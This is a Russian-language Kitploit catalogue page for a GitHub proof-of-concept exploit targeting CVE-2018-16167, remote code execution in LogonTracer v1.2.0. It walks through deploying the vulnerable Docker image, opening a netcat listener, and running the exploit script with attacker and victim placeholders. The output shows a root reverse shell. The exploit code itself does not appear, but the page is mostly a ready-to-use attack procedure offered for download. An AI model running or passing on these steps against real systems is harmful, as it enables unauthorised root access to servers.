Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-16167 — Доказательство концепции эксплуатации уязвимости удалённого выполнения кода в LogonTracer v1.2.0, обеспечивающее обратную оболочку через Python и netcat. | Kitploit
Инструменты/GitHubGitHub/dnr6419/cve-2018-16167
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

Доказательство концепции эксплуатации уязвимости удалённого выполнения кода в LogonTracer v1.2.0, обеспечивающее обратную оболочку через Python и netcat.

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Порядок установки и запуска

0. Установка LogonTracer

Загружаем с dockerhub версию logontracer 1.2.0, в которой была обнаружена уязвимость.

root@kitploit:~
 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. Запуск LogonTracer

Запускаем контейнер следующей командой:

root@kitploit:~
 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. nc на хосте для получения shell

Открываем определённый порт хоста, на котором будет получена shell, с помощью nc.

root@kitploit:~
 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. Запуск эксплойта

Запускаем эксплойт.

root@kitploit:~
 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

Результат выполнения

Как показано на рисунке ниже, видно, что эксплойт выполнился корректно и мы получили remote shell.

root@kitploit:~
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

Скачать инструмент